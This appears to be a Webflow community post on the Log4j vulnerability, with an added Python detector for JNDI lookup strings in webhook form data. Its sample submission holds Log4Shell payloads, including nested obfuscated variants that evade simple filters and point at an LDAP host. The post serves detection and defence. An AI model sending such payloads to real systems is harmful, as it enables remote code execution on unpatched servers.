Hi all! Matthew here from Webflow’s Community Team, following up regarding the Apache Log4j vulnerability issue.
Webflow’s platform is not built on Java and does not use Log4j directly. We are aware of the follow-up CVEs, CVE-2021-45046 and CVE-2021-45105, and have mitigated these issues. At this time we have completed every mitigation that is directly within our control, and we will continue to monitor our downstream partners.
Here are the actions Webflow has taken:
- We have enabled Web Application Firewall (WAF) detection and blocking rules against this vector, and confirmed coverage of all server and API endpoints.
- We have further validated our WAF rules and confirmed that our coverage is complete.
- We have engaged vendors and downstream dependent partners to assess whether they are affected, and are monitoring their remediation efforts.
- We have implemented rules within our EDR tools to monitor corporate and employee endpoints.
Here are the actions we recommend our customers take at this time:
- We recommend that you follow AWS’s Log4j updates directly, as we are unable to push Amazon AWS to accelerate patching of these services. Please follow those updates at the source rather than relying on us to relay this information.
- If any of your sites have forms with webhooks configured, the submitted form data is forwarded to your webhook service provider, and attacker-controlled field values may contain JNDI lookup strings (for example `${jndi:ldap://...}`), including obfuscated variants. We advise that you follow up with any service providers handling those requests and ensure they have mitigated this vector.
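The following is an added example, not Webflow's code, of the kind of check a webhook receiver (or a WAF rule author) can run over forwarded form fields: it collapses the nested-lookup evasions that were used against Log4j 2 (`${lower:…}`, `${upper:…}`, and the `${name:key:-default}` fallback syntax) from the inside out, then reports any `${jndi:…}` lookup that remains. The payload below is constructed for illustration; the IP addresses and field names are assumptions.

```python
import re
from typing import Dict, List, Optional, Tuple

# Innermost ${...} lookup: no nested "${" or "}" between the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve(body: str) -> str:
    """Emulate the Log4j 2 lookups an attacker can use to disguise 'jndi'.

    Mirrors StrSubstitutor: split off a ':-' default first, then resolve the
    prefix; 'lower'/'upper' are computed, unknown prefixes fall back to the
    default if one was given, otherwise the lookup is left untouched.
    """
    if body.lower().startswith("jndi:"):
        return "${" + body + "}"          # keep the final lookup intact for reporting
    name, has_default, default = body.partition(":-")
    prefix, _, key = name.partition(":")
    prefix = prefix.lower()               # Log4j lower-cases the prefix
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if has_default:                       # e.g. ${::-j} or ${env:NOPE:-j} -> "j"
        return default
    return "${" + body + "}"              # env/date/etc.: unresolved, leave as is


def normalize(value: str) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    prev = None
    while prev != value:
        prev = value
        value = _INNER.sub(lambda m: _resolve(m.group(1)), value)
    return value


def find_jndi(value: str) -> Optional[str]:
    """Return the de-obfuscated JNDI target if the value carries a Log4Shell lookup."""
    s = normalize(value)
    i = s.lower().find("${jndi:")
    if i < 0:
        return None
    start = j = i + len("${jndi:")
    depth = 1
    # Walk to the matching brace so a nested exfil lookup such as
    # ${jndi:ldap://host/${env:SECRET}} is reported whole.
    while j < len(s) and depth:
        if s.startswith("${", j):
            depth += 1
            j += 2
            continue
        if s[j] == "}":
            depth -= 1
        j += 1
    return s[start:j - 1] if depth == 0 else s[start:]


def scan_form_submission(fields: Dict[str, str]) -> List[Tuple[str, str]]:
    """Check every string field of a forwarded form payload; returns (field, target) hits."""
    hits = []
    for name, val in fields.items():
        if isinstance(val, str):
            target = find_jndi(val)
            if target:
                hits.append((name, target))
    return hits


# Constructed sample payload (not real traffic); addresses are documentation ranges.
SAMPLE_SUBMISSION = {
    "name": "Jane Doe",
    "email": "${jndi:ldap://198.51.100.23:1389/a}",
    "message": "${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:${lower:LDAP}://198.51.100.23:1389/b}",
    "company": "Acme ${date:yyyy}",              # a lookup, but not JNDI
    "website": "https://example.com/?q=${::-x}",  # default syntax without jndi
}

if __name__ == "__main__":
    for field, target in scan_form_submission(SAMPLE_SUBMISSION):
        print(f"JNDI lookup in field {field!r}: {target}")
```

The point of normalising before matching is that a naive `${jndi:` substring rule is defeated by the nested-lookup forms in the `message` field above; a receiver that does this check can reject or sanitise the submission before it reaches any logging path. It is a detection aid, not a substitute for upgrading Log4j on the receiving side.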
We hope the information shared here is helpful! Please feel free to reach out to our Customer Support Team (email@example.com) with any additional questions, concerns, or feedback, and we’ll be happy to assist.